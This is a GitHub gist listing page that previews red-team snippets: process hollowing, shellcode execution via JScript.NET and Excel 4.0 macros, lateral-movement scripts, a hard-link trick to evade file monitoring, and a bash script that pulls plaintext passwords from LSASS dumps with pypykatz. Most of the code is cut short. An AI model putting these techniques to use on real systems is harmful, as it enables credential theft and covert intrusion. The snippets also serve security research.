Skip to content

Instantly share code, notes, and snippets.

View TheWover's full-sized avatar

TheWover

1.1k followers · 50 following
View GitHub Profile
@TheWover
TheWover / mapfromdisk.cs
Last active November 9, 2019 16:10
Manually map a module (DLL) into memory from disk in such a way that it shows up as file-backed.
/// <summary>
/// Maps a DLL from disk into a Section.
/// </summary>
/// <author>The Wover (@TheRealWover)</author>
/// <param name="DLLName">Path of the file on disk.</param>
/// <returns>Pointer to the mapped DLL in memory.</returns>
public static IntPtr MapModuleFromDisk(string DLLName)
{
//If the file is not found, a FileNotFoundException will be thrown.
FileStream module = File.OpenRead(DLLName);
@TheWover
TheWover / mscorlib_load_assembly.vba
Created September 30, 2019 19:58 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@TheWover
TheWover / shellcode.js
Created September 26, 2019 17:46 — forked from Ridter/shellcode.js
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
@TheWover
TheWover / mymykat.sh
Created September 20, 2019 14:35 — forked from seajaysec/mymykat.sh
super rough plaintext secret parser for pypykatz dumps
#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir
ext='.dmp'
for i in *$ext; do
txtfile=${i::-3}txt
secrets=${i::-3}secrets
pypykatz lsa minidump $i -o $txtfile;
grep 'password' $txtfile -B 2 | grep -v 'None' | grep 'password' -B 1 | sed -e "s#--##g" | sed '/^$/d' | sed '$!N;s/\n/ /' | sed 's/username //g' | sed 's/password /::/g' | tr -d '[:blank:]' | sort -u > $secrets
@TheWover
TheWover / Update_Notes.md
Created August 5, 2019 13:14
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@TheWover
TheWover / Hollowing.cs
Created July 26, 2019 20:25 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@TheWover
TheWover / ReadingPortableExecutable_PE_header.cs
Created July 21, 2019 20:05 — forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C#
// Credits: John Stewien
// From: http://code.cheesydesign.com/?p=572
/*
Reading the Portable Executable (PE) header in C#
My job consists of writing fully custom applications for groups of people. The time pressure of these projects is quite high, so generally people start using the application while I’m still writing it, which means I write it modularly and add features as I go along. I also fix bugs as they are discovered. My clients are 2 tiered where expert users get a new build first, they test if for a while, and if they think it’s acceptable they then pass it on to others.
This method of distribution is quite ad-hoc so when a client rings me up and asks me to view their screen to look at something, it’s useful to know what build they are running. To facillitate this I print the link date in the main Window Title so I instantly have an idea about how old the version is that I am looking at. This date is calculated at run time. To do this requires reading in the Portable Executable (PE) header from th
@TheWover
TheWover / Invoke-ExShellcode.ps1
Created July 9, 2019 16:30 — forked from Philts/Invoke-ExShellcode.ps1
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#
@TheWover
TheWover / Invoke-AccessXSLT.ps1
Created July 9, 2019 16:16 — forked from Philts/Invoke-AccessXSLT.ps1
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
@TheWover
TheWover / keybase.md
Created June 11, 2019 00:04

Keybase proof

I hereby claim:

  • I am TheWover on github.
  • I am thewover (https://keybase.io/thewover) on keybase.
  • I have a public key whose fingerprint is BB56 08FA 6976 C078 4419 DD32 555E AF97 1A8F C794

To claim this, I am signing this object: